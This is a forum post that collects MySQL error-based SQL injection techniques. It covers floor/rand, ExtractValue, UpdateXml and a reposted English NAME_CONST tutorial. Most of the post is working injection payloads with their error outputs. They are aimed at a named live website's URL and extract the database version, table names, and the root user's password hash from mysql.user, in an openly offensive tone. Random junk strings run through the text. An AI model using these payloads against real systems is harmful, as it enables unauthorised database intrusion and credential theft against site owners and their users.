|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
: C3 `; Y k V首先进行正常查询: mysql> select * from article where id = 1;
5 |( P0 ^ A% @5 C. a4 m+—-+——-+———+, t& h- d. Q" b3 M
| id | title | content |' [" X, {' G2 q, U
+—-+——-+———+
" U: G# L; }/ o9 D b| 1 | test | do it |
0 ]4 R( A9 D u' M+ Q/ n% A0 T+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
" H, D' a8 t9 Y! sERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。; M" j, N# b$ a* J$ I
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);+ H, n8 ]3 v7 g2 u
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));0 z& v1 U& m9 S' Y4 B
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
" S- O& Q* H. g' V5 T2 F7 C测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–* C5 H1 k6 I3 U r
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ . E( Z; R3 ]1 `7 v1 u
2 g& G+ X# T$ I4 t( d+ c* y
再收集:
/ L& b$ }# ~- u) r/ C) Xhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) , H2 L! d/ O( b( v w1 t
2 s# E* ~" `7 T% f. eError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
5 Z# H0 L+ s* }& A# H& ?0 X2 x4 P" w
, h" W" z$ {* U# S0 Dhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)+ D; `8 W: `* M1 I1 \: {! q& ~
5 R( b9 ^( c3 @5 A) H4 v& m# {
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 0 \, _3 O! j- Z* I5 f. }
' u# d% L) v0 y& N/ ~0 wMYSQL高版本报错注入技巧-利用NAME_CONST注入/ E6 d/ I; g1 @
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. $ |& [6 ^0 E* A, _6 C5 a5 n
( k; i4 \4 d2 D
/ k, y8 Y$ {2 Z: F0 ~
相关信息8 V# X1 B3 S2 |. W1 j. S
: t$ u6 U! x6 n$ t3 u
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
9 g- X! D2 j/ W0 M5 o# z' B8 L1 w, t% W& z7 ^% i+ o+ @
Code: d$ l: J) H0 z
NAME_CONST(DATA, VALUE); G* e+ W- N' P) W1 U& v
' \- H7 \; j- I, F
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
7 T! v6 D" a; ]2 c" ?, _2 A
: e) h% P3 A' X$ HSELECT NAME_CONST('TEST', 1)
8 J9 d' k& K4 c. B: G
. N. N- }% t8 F' E+ e$ k8 y( a% `& g9 o$ H, |7 i' g0 c, p5 L% Z
6 V: \4 {* u6 d3 ]7 B) q9 P|---------------|
; v9 c1 i% {$ l| TEST |
& O0 D2 x* |' g4 U3 @6 F| |
+ A2 H% X8 y8 t, H. C( @; y|---------------|
" n" [% e8 {7 U. {' d2 ^| 1 |
4 l i8 _' S, x+ o' |6 a- ^% \ j| |; d8 n' U5 r0 O; `2 Q2 X5 ~' h3 C
|---------------|
4 \) W6 A( @& P/ ^1 O4 T! l; _
: D( R7 U6 @8 X1 g% `9 w2 z
2 f5 C) {9 C3 d$ l3 z
4 ^9 `, o4 m, p- b. r" N0 ?4 o, @6 ?http://dev.mysql.com/doc/refman/5.0/en/m...name-const+ b5 p( S k/ Z% u! f! I
Intro to MySQL Variables
. k8 T+ }; C1 ` j- |" _5 o- _. U: _) ~0 s
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
3 I/ s; V6 b$ {6 J
7 _. w) X4 z6 BCode: q( ]. H+ I6 Q4 T
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261) |5 m# o5 Y1 d& d
1 Y, `2 h4 j8 s- _2 s* I' D
) M0 ?; K& f9 j' U
* Y7 k5 b$ I( M# D
e: k9 O. W, k& X# \$ V
- Y0 Q; s+ B6 F% h( V8 d' M0 D3 XCode:
; O5 Q' V% j) B: C1 ^# kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
" _) B. j$ a/ R5 `& u3 n3 e' c! c5 |4 p' }" q, j
8 B2 d9 B/ s; _% zVAR = Your MySQL variable., s7 ^3 U2 I2 I2 Z
1 ?8 M! k- \- YMySQL 5.1.3 Server System Variables% h2 F1 c. ?' g. R2 q
2 d( o0 x: U2 G6 JLet's try it out on my site..$ T6 W% ?7 s: q+ v3 b
- W1 b7 G+ a0 L$ p/ x
Code:
2 }# i [6 g" l$ Ghttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
8 Q k( J+ {/ v9 Z1 J& [2 j2 w1 b/ W [5 m+ Q
Erroruplicate column name '5.0.27-community-nt'$ B& d5 J9 F5 s \
) _& S* ]! q4 l" P3 x0 c! \- f
6 Y4 G3 }4 q# y+ O
4 {$ _0 ]: T4 C- e9 w0 \( O0 `& ]# w7 X( H6 j! D- [0 \- E9 ?
2 b) T7 x( h& J. V5 ]3 A
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
7 `' ?' j# C$ K8 C& i& [% u2 L3 t1 [& G7 s# g9 N' m9 l6 J
Data Extraction1 D" m# F9 O! L. f1 B" L# V& O) s. j
: p2 L& R: ?; _2 [9 A7 fCode:4 ^* p: N. N% V M x2 @5 v$ m
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
2 y( g9 k0 X5 M: c- q* ?1 X
l- d- C- i7 k2 Q1 ~9 N) Q# O/ d
7 X: u) Y5 h- DWe should get a duplicate column 1 error...
0 }0 J+ m, Z q0 n4 ^8 _7 r! o+ t9 `- A
Code:. ^8 [3 c8 k& o1 O
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
" @7 d. I" O; `. e. q' z- ^, I* v9 `( v* u3 ?6 n1 N
Erroruplicate column name '16 l6 J3 y, h! s6 I
$ b- }" v. N i+ T' S. F- O4 Q# l
* C$ Y; j: W: {. g R6 t$ l
/ t4 S9 G5 W( O0 n$ {8 S \4 r
! L% C0 `5 g% G* O$ X: g* e2 F6 D; X9 w1 J8 d2 k6 n
' d- W( w+ C3 d& T# e" fNow let's get the tables out this bitch.." u* V# M' j8 R" U* `$ M( x1 S: W
( q0 x/ k! J+ P# _4 \& m. yCode:5 l! [( M2 |; s3 \6 G) @0 E+ {; p2 b
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
) C9 b9 C2 h& [6 G4 \' R# k9 E' M. y; c, Q- M+ U
! d, ?+ ~, I5 ^8 E# WLet's see if it works here, if it does, we can go on and finish the job.
9 [; x5 d+ J! P* N; T" P7 ]
. q. }0 j _! `7 y# T2 eCode:
4 k1 p. j: ^+ }. p& _http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
6 Z R$ N' e8 V6 F( |. t. Z2 v* ^ @7 G- ?% {
; t7 [! @3 F9 L- f. v
Erroruplicate column name 'com_admanage
6 r! \# N) E2 w; E% u; ^; ^! j' @; i1 Y" D0 K! {
6 F. Q8 y$ D9 q) K
; }3 V. z" q- l. P$ i4 g3 W$ B4 p6 c/ J
2 _. [: ~0 L; M( q+ E& x! s. R
) G1 i# Y4 S; n$ XNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.4 E2 g5 Y$ A0 U8 {' w* j/ M7 l X$ k
; _& ^( b& I2 U6 o: cLet's get the columns out of the user table..9 _* L4 T$ ]/ W8 W0 A A t
. m4 e( v* F, h0 `3 k5 d# c
Code:! o3 O3 c8 X# W5 |, p9 z# C
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
9 T# F& }& n3 l# A5 C
5 E. d$ u4 e: z6 s& H" ^6 D! q0 L8 `7 _, g# H* z1 C! h
So mine looks like this, and I get the duplicate column name 'Host'.
$ i* X0 S( w, a( N3 `3 x
1 S9 y0 q" g4 ]Code:
, J, p' V6 [3 G! m3 h" ]- Phttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
% K4 M7 T" Q2 R! }3 B% P+ r; \% c* f6 ^3 [# p
Erroruplicate column name 'Host'7 F6 U4 x( p) q" j/ o" @
) ]: J5 @! {8 Y( ~! T
- E+ P; I7 J) N% M* H+ o. T9 f/ V1 k1 L5 v- C6 s/ ^/ a
' C; v9 P) f, r2 U1 [3 A0 H# u4 y9 T& w: G6 B; ^! R( e1 ~
5 N6 t/ @, ^& B. `9 |
Woot, time to finish this bitch off.1 v1 I a B# L$ C1 t/ A; X
}5 N+ x2 B1 ]* S5 g( e: Q# a
Code:
2 E7 E5 e1 [7 V& ]# L+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--! d2 \) t& K1 r. Y" X
8 ~7 g5 c7 J: d. ]4 U2 P
; d3 l5 I- n* _9 x, VSo mine looks like this...
8 q2 P( e$ |7 [3 i. X! K* P
0 d' q# u' w3 W8 V! \Code:) z2 U+ ]* Y9 z* z! i& s
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
4 G8 G6 E+ C$ N8 H: O# j* Q. ~' e" P+ w& [; b. T2 W; h
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'6 |: E: ?, s& x2 q$ E# u
( l+ e' a' l/ O# S$ N
. y2 l+ J) l1 p$ e . b3 \5 x0 J3 \/ ^; p7 t
$ a0 F: P' h3 W9 W2 N! r1 ~* R
% l0 f3 G; _' ~- S# [) v
, q6 T7 Y3 [: e" j7 {5 A! G5 \And there we have it, thanks for reading.: a0 ^+ E4 a2 T; c2 W
: m! ^1 \( p& Z. \) s- z |
发表于 2015-11-11 19:03:37
收藏
支持
反对